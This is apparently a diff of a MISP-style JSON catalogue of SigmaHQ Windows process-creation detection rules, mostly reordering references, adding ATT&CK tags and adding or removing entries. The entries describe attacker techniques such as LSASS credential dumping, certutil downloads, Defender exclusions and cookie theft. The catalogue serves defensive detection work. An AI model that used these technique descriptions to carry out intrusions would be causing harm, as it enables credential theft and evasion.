fsutil fsinfo drives to list connected drives.", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_drive_enumeration.yml" ], "tags": [ @@ -49708,9 +50433,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://man.openbsd.org/ssh_config#ProxyCommand", - "https://man.openbsd.org/ssh_config#LocalCommand", "https://github.com/LOLBAS-Project/LOLBAS/pull/211/files", + "https://man.openbsd.org/ssh_config#LocalCommand", + "https://man.openbsd.org/ssh_config#ProxyCommand", "https://gtfobins.github.io/gtfobins/ssh/", "https://lolbas-project.github.io/lolbas/Binaries/Ssh/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ssh.yml" @@ -49912,8 +50637,8 @@ "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime", "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml" ], "tags": [ @@ -49982,8 +50707,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/_JohnHammond/status/1588155401752788994", "Internal Research", + "https://twitter.com/_JohnHammond/status/1588155401752788994", "https://twitter.com/Max_Mal_/status/1633863678909874176", "https://techcommunity.microsoft.com/t5/microsoft-365-blog/new-security-hardening-policies-for-trusted-documents/ba-p/3023465", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_exec_from_trusted_locations.yml" @@ -50080,39 +50805,6 @@ "uuid": "62e0298b-e994-4189-bc87-bc699aa62d97", "value": "Potential Suspicious Registry File Imported Via Reg.EXE" }, - { - "description": "Detects suspicious command line arguments of common data compression tools", - "meta": { - "author": "Florian Roth (Nextron Systems), Samir Bousseaden", - "creation_date": "2019/10/15", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_compression_params.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/SBousseaden/status/1184067445612535811", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_compression_params.yml" - ], - "tags": [ - "attack.collection", - "attack.t1560.001" - ] - }, - "related": [ - { - "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "related-to" - } - ], - "uuid": "27a72a60-7e5e-47b1-9d17-909c9abafdcd", - "value": "Suspicious Compression Tool Parameters" - }, { "description": "The \"VSIISExeLauncher.exe\" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries", "meta": { @@ -50192,13 +50884,13 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32", - "https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32", - "https://twitter.com/CyberRaiju/status/1251492025678983169", - "https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/", "https://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool", + "https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback", + "https://twitter.com/CyberRaiju/status/1251492025678983169", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32", "https://www.cobaltstrike.com/help-opsec", + "https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bad_opsec_sacrificial_processes.yml" ], "tags": [ @@ -50231,11 +50923,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://forensicitguy.github.io/agenttesla-vba-certutil-download/", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", - "https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/", "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", + "https://forensicitguy.github.io/agenttesla-vba-certutil-download/", + "https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/", "https://twitter.com/egre55/status/1087685529016193025", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_download_direct_ip.yml" ], "tags": [ @@ -50434,8 +51126,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/decoder-it/LocalPotato", "https://www.localpotato.com/localpotato_html/LocalPotato.html", + "https://github.com/decoder-it/LocalPotato", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_localpotato.yml" ], "tags": [ @@ -50528,8 +51220,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy", "https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade", + "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_new_network_provider.yml" ], "tags": [ @@ -50596,9 +51288,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Winget/", - "https://docs.microsoft.com/en-us/windows/package-manager/winget/install#local-install", "https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget", + "https://docs.microsoft.com/en-us/windows/package-manager/winget/install#local-install", + "https://lolbas-project.github.io/lolbas/Binaries/Winget/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winget_local_install_via_manifest.yml" ], "tags": [ @@ -50665,9 +51357,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell", "https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps", "https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/", + "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_web_request_cmd_and_cmdlets.yml" ], "tags": [ @@ -50738,8 +51430,20 @@ "https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_parents.yml" ], - "tags": "No established tags" + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ] }, + "related": [ + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cbec226f-63d9-4eca-9f52-dfb6652f24df", "value": "Suspicious Process Parents" }, @@ -50758,8 +51462,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/AdamTheAnalyst/status/1483497517119590403", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_exclusion.yml" ], "tags": [ @@ -50882,9 +51586,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", "https://twitter.com/_st0pp3r_/status/1583914515996897281", "https://lolbas-project.github.io/lolbas/Binaries/Msiexec/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_dll.yml" ], "tags": [ @@ -50920,8 +51624,32 @@ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_use_password_plaintext.yml" ], - "tags": "No established tags" + "tags": [ + "attack.defense_evasion", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1078" + ] }, + "related": [ + { + "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d4498716-1d52-438f-8084-4a603157d131", "value": "Password Provided In Command Line Of Net.EXE" }, @@ -50972,8 +51700,8 @@ "logsource.product": "windows", "refs": [ "https://businessinsights.bitdefender.com/deep-dive-into-a-backdoordiplomacy-attack-a-study-of-an-attackers-toolkit", - "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)", "https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html", + "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ldifde_export.yml" ], "tags": [ @@ -51086,9 +51814,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/samratashok/ADModule", "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges", "https://twitter.com/cyb3rops/status/1617108657166061568?s=20", + "https://github.com/samratashok/ADModule", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_active_directory_module_dll_import.yml" ], "tags": [ @@ -51113,8 +51841,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70", "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html", + "https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_susp_download_patterns.yml" ], "tags": [ @@ -51147,10 +51875,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://strontic.github.io/xcyclopedia/library/setres.exe-0E30E4C09637D7A128A37B59A3BC4D09.html", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)", "https://twitter.com/0gtweet/status/1583356502340870144", "https://lolbas-project.github.io/lolbas/Binaries/Setres/", + "https://strontic.github.io/xcyclopedia/library/setres.exe-0E30E4C09637D7A128A37B59A3BC4D09.html", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_setres.yml" ], "tags": [ @@ -51192,8 +51920,8 @@ "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment?slide=43", - "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat", "https://github.com/gladiatx0r/Powerless/blob/04f553bbc0c65baf4e57344deff84e3f016e6b51/Powerless.bat", + "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat", "https://www.youtube.com/watch?v=JGs-aKf2OtU&ab_channel=OFFZONEMOSCOW", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_accesschk_check_permissions.yml" ], @@ -51479,8 +52207,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md", "https://securelist.com/to-crypt-or-to-mine-that-is-the-question/86307/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certmgr_certificate_installation.yml" ], "tags": [ @@ -51586,8 +52314,28 @@ "https://twitter.com/an0n_r0/status/1474698356635193346?s=12", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_download_office_domain.yml" ], - "tags": "No established tags" + "tags": [ + "attack.command_and_control", + "attack.t1105", + "attack.t1608" + ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "84771bc3-f6a0-403e-b144-01af70e5fda0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", "value": "Suspicious Download from Office Domain" }, @@ -51606,8 +52354,8 @@ "logsource.product": "windows", "refs": [ "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", - "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", "https://www.poweradmin.com/paexec/", + "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml" ], "tags": [ @@ -51640,8 +52388,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/Moriarty_Meng/status/984380793383370752", "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Powershell.yml", + "https://twitter.com/Moriarty_Meng/status/984380793383370752", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_run_script_from_input_stream.yml" ], "tags": [ @@ -51710,10 +52458,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://web.archive.org/web/20220224045756/https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf", "https://uvnc.com/docs/uvnc-viewer/52-ultravnc-viewer-commandline-parameters.html", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine", "https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution", + "https://web.archive.org/web/20220224045756/https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ultravnc_susp_execution.yml" ], "tags": [ @@ -51747,8 +52495,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/JohnLaTwC/status/1082851155481288706", "https://app.any.run/tasks/f87f1c4e-47e2-4c46-9cf4-31454c06ce03", + "https://twitter.com/JohnLaTwC/status/1082851155481288706", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_susp_ps_appdata.yml" ], "tags": [ @@ -51847,9 +52595,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/win32/secauthz/mandatory-integrity-control", - "https://cybercryptosec.medium.com/covid-19-cyber-infection-c615ead7c29", "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/", + "https://cybercryptosec.medium.com/covid-19-cyber-infection-c615ead7c29", + "https://learn.microsoft.com/en-us/windows/win32/secauthz/mandatory-integrity-control", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conhost_legacy_option.yml" ], "tags": [ @@ -51916,8 +52664,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://web.archive.org/web/20220514073704/https://github.com/ch2sh/Jlaive", "https://jstnk9.github.io/jstnk9/research/Jlaive-Antivirus-Evasion-Tool", + "https://web.archive.org/web/20220514073704/https://github.com/ch2sh/Jlaive", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_jlaive_batch_execution.yml" ], "tags": [ @@ -51950,10 +52698,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/ForensicITGuy/status/1334734244120309760", + "https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/", "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", - "https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/", + "https://twitter.com/ForensicITGuy/status/1334734244120309760", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmiprvse_susp_child_processes.yml" ], "tags": [ @@ -52003,10 +52751,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry", - "https://github.com/synacktiv/Radmin3-Password-Cracker/blob/acfc87393e4b7c06353973a14a6c7126a51f36ac/regkey.txt", - "https://isc.sans.edu/diary/More+Data+Exfiltration/25698", "https://github.com/HyperSine/how-does-MobaXterm-encrypt-password", + "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry", + "https://isc.sans.edu/diary/More+Data+Exfiltration/25698", + "https://github.com/synacktiv/Radmin3-Password-Cracker/blob/acfc87393e4b7c06353973a14a6c7126a51f36ac/regkey.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_enumeration_for_credentials_cli.yml" ], "tags": [ @@ -52095,8 +52843,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/jonasLyk/status/1555914501802921984", "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", + "https://twitter.com/jonasLyk/status/1555914501802921984", "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_use_image.yml" ], @@ -52140,41 +52888,6 @@ "uuid": "9082ff1f-88ab-4678-a3cc-5bcff99fc74d", "value": "HackTool - GMER Rootkit Detector and Remover Execution" }, - { - "description": "Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials.\nIdentifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.\n", - "meta": { - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_susp_lsass_dump.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/210b4ea4-12fc-11e9-8d76-4d6bb837cda4.html", - "https://eqllib.readthedocs.io/en/latest/analytics/1e1ef6be-12fc-11e9-8d76-4d6bb837cda4.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lsass_dump.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ] - }, - "related": [ - { - "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "related-to" - } - ], - "uuid": "ffa6861c-4461-4f59-8a41-578c39f3f23e", - "value": "LSASS Memory Dumping" - }, { "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", "meta": { @@ -52286,39 +52999,6 @@ "uuid": "24357373-078f-44ed-9ac4-6d334a668a11", "value": "Direct Autorun Keys Modification" }, - { - "description": "Detects a suspicious winrar execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", - "meta": { - "author": "Florian Roth (Nextron Systems)", - "creation_date": "2022/01/04", - "falsepositive": [ - "Legitimate use of WinRAR with a command line in which .dmp appears accidentally" - ], - "filename": "proc_creation_win_winrar_dmp.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winrar_dmp.yml" - ], - "tags": [ - "attack.collection", - "attack.t1560.001" - ] - }, - "related": [ - { - "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "related-to" - } - ], - "uuid": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", - "value": "Winrar Compressing Dump Files" - }, { "description": "Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.", "meta": { @@ -52365,8 +53045,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1539/T1539.md#atomic-test-1---steal-firefox-cookies-windows", "https://blog.cyble.com/2022/04/21/prynt-stealer-a-new-info-stealer-performing-clipper-and-keylogger-activities/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1539/T1539.md#atomic-test-1---steal-firefox-cookies-windows", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlite_firefox_gecko_profile_data.yml" ], "tags": [ @@ -52409,10 +53089,10 @@ "logsource.product": "windows", "refs": [ "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", - "https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md", + "https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html", "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml" ], "tags": [ @@ -52497,12 +53177,42 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://tools.thehacker.recipes/mimikatz/modules", "Internal Research", + "https://tools.thehacker.recipes/mimikatz/modules", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml" ], - "tags": "No established tags" + "tags": [ + "attack.credential_access", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1134", + "attack.t1003", + "attack.t1027" + ] }, + "related": [ + { + "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", "value": "Suspicious SYSTEM User Process Creation" }, @@ -52519,8 +53229,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/", "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", + "https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gpg4win_susp_location.yml" ], "tags": [ @@ -52563,40 +53273,6 @@ "uuid": "7f43c430-5001-4f8b-aaa9-c3b88f18fa5c", "value": "Execute From Alternate Data Streams" }, - { - "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", - "meta": { - "author": "Ivan Dyachkov, oscd.community", - "creation_date": "2020/10/07", - "falsepositive": [ - "False postitve can be if administrators use diskshadow tool in their infrastructure as a main backup tool with scripts." - ], - "filename": "proc_creation_win_lolbin_diskshadow.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", - "https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_diskshadow.yml" - ], - "tags": [ - "attack.execution", - "attack.t1218" - ] - }, - "related": [ - { - "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "related-to" - } - ], - "uuid": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", - "value": "Execution via Diskshadow.exe" - }, { "description": "Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs", "meta": { @@ -52610,8 +53286,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/wdormann/status/1478011052130459653?s=20", "https://twitter.com/0gtweet/status/1477925112561209344", + "https://twitter.com/wdormann/status/1478011052130459653?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_format.yml" ], "tags": [ @@ -52621,6 +53297,49 @@ "uuid": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", "value": "Format.com FileSystem LOLBIN" }, + { + "description": "Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity", + "meta": { + "author": "Florian Roth (Nextron Systems), Samir Bousseaden", + "creation_date": "2021/11/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lsass_process_clone.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/", + "https://twitter.com/SBousseaden/status/1464566846594691073?s=20", + "https://twitter.com/Hexacorn/status/1420053502554951689", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lsass_process_clone.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.t1003.001" + ] + }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", + "value": "Potential Credential Dumping Via LSASS Process Clone" + }, { "description": "Detect the use of Windows Defender to download payloads", "meta": { @@ -52634,8 +53353,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://web.archive.org/web/20200903194959/https://twitter.com/djmtshepana/status/1301608169496612866", "https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/", + "https://web.archive.org/web/20200903194959/https://twitter.com/djmtshepana/status/1301608169496612866", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_mpcmdrun_download.yml" ], "tags": [ @@ -52677,8 +53396,8 